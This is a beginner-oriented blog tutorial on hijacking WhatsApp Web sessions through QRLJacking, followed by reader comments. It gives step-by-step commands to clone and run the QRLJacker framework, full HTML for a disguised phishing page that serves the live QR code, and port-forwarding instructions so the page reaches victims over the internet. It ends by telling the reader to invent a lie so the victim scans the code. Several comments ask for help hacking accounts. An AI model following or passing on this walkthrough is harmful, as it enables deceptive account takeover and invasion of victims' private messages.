Whatsapp web has been out for a while now
it gives you the ability to use whatsapp on your computer, you simply need to scan a QR code with your phone from whatsapp and you'll gain access
1-QR code?
a QR code(short for quick response code) stores a bunch of code inside it and is widely used because of how fast it can be read by smartphones.
this is a QR code:
How are we supposed to use phishing in this scenario if there's no credentials?
Well, theoretically, if we can come up with something that can extract the qr code from the web.whatsapp.com page open on our browser, and display it on a website we made,then send that link to the victim to scan the QR code on it, the whatsapp session should be open on the original whatsapp web page on our browser.
Now, you must be asking, you expect beginners to code that?
No, I'm well aware you can't
fortunately, the work has already been done, all you have to do is follow the steps.
OWASP created a tool, capable of doing all that
this attack has been out for so long, but to my surprise not many people know about it, so i thought about shedding some light on it.
Okay so how do we use it?
Let's start by opening a new terminal
and type in git clone https://github.com/OWASP/QRLJacking.git
side note:There's two ways to use this, either manually or automatically by using the QrlJacker
For the sake of keeping this tutorial short, and for it to be beginner friendly, I'll demonstrate how to do this with the QrlJacker.
now we need to enter the directory that contains the frame work, to check if we have all of the requirements
to do that we will use CD
type in your terminal cd QRLJacking/QrlJacking-Framework
if you're using kali linux, usually the requirements are already met, but as a matter of caution we'll run the requirements installation script anyway.
to do that type in pip install -r requirements.txt
Now that that is done, we're ready to start
To use the QrlJacker type in the following:
python QRLJacker.py
As you can see, many options are available, but for our tutorial we're only interested in whatsapp
type in 1 and click enter
then type in 1 another time
you'll be asked to choose a port, leave it empty if you would like to use the default port(1337)
A new window of mozilla firefox will be opened and the server will be started at yourIpAdress:portYouChose
for me it's 192.168.1.103:1337
As you can see, The qr code is displayed on this local website that we will send to the victim
but who would scan that? Too suspicious
Let's edit it.
go to QRLJacking/QrlJacking-Framework/
right click on index.html
open with other application, choose a text editor
then edit it to be like this code
<!DOCTYPE html>
<html>
<head>
<title>Whatsapp</title>
</head>
<body>
<script>
var myTimer; myTimer = window.setInterval(reloadD,3000);
function reloadD(){ d = new Date(); document.getElementById('qrcodew').src="tmp.png?h="+d.getTime();}
</script>
<center>
<img id="qrcodew" alt="Scan me!" src="tmp.png" style="display: block;">
<a href="#">Scan the code with whatsapp</a>
</center>
</body>
<style>
body {
background-color:#000;
}
#qrcodew {
background-color: white;
padding-right: 35%;
margin-top: 10%;
padding-top: 4%;
padding-bottom: 4%;
padding-left: 35%;
}
a {
text-decoration: none;
}
</style>
</html>
Kept that code as simple as possible, that way even beginners have a chance in understanding and editing the code to their liking
this is script kiddie level code
To be able to do this attack easily over wan, go to your router configuration page and forward the port 1337 on your private ip
(in my case it's 192.168.1.103)
then
the link will be yourPublicIpAdress:portYouForwarded
example: 93.176.88.82:1337
send that link to the victim if he's outside of your network
and he'll be able to access our fake website
create a lie to make them scan the code
and you'll be able to access their whatsapp.
5 Responses
Keep this series going. I did not know about this. I am gonna try it tonight.
scan using what app on android? and how about the currently active logged on couputer message ?
after running this python QRLJacker.py, I am able to open qrljaker but unable to hack whatsapp getting lots of errors please help me on this.
firefox-esr install error i am getting even I have firefox-esr
Is there anyway that i will scan the QR in any other app and it will connect and create session with whatsapp
How can I Hack WhatsApp account with an image
Share Your Thoughts